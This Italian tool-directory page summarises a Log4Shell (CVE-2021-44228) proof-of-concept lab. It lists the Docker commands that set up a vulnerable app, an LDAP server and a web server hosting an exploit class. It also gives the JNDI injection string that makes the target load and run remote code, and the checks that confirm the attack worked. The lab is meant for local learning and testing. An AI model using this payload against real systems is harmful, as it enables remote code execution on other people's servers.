Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/1hakusai1/log4j-rce-cve-2021-44228
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHub1hakusai1/log4j-rce-cve-2021-44228

log4j-rce-CVE-2021-44228

log4j2 CVE-2021-44228 POC

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Panoramica

Questo è un progetto per testare la vulnerabilità di esecuzione remota di codice in log4j2 (CVE-2021-44228).

Avviare i contenitori

root@kitploit:~
docker-compose up

Il contenitore log4j impiega un po' di tempo per diventare disponibile dopo l'avvio. Controlla lo stato con il seguente comando.

root@kitploit:~
docker logs -f log4j

Quando viene visualizzato Server started: Listening on port 8081 è tutto pronto.

Controllo dello stato prima dell'attacco

Verifica la directory /root del contenitore log4j.

root@kitploit:~
docker exec log4j ls /root

Nello stato iniziale, è presente solo la directory .

Scarica lo strumento
work

Esecuzione effettiva dell'attacco

Accedi a http://localhost:8081/. È una semplice applicazione che stampa a schermo e nel log il nome inserito nel modulo.

Inserisci nel modulo ${jndi:ldap://ldap.example.com/cn=java,dc=example,dc=com} e invia.

Verifica la directory /root del contenitore log4j.

root@kitploit:~
docker exec log4j ls /root

Il codice preparato dall'attaccante viene eseguito e dovrebbe creare file che prima non esistevano. Poiché il nome del file è basato sul timestamp, ogni attacco aggiunge un nuovo file.

Controllando i log del contenitore ldap, si può vedere che il contenitore log4j ha inviato una richiesta SEARCH.

root@kitploit:~
docker logs ldap

Controllando i log di tomcat del contenitore web, si può vedere che il contenitore log4j ha effettuato l'accesso a Exploit.class (la classe utilizzata per l'attacco).

root@kitploit:~
docker exec -it web bash
cat /usr/local/tomcat/logs/localhost_access_log.*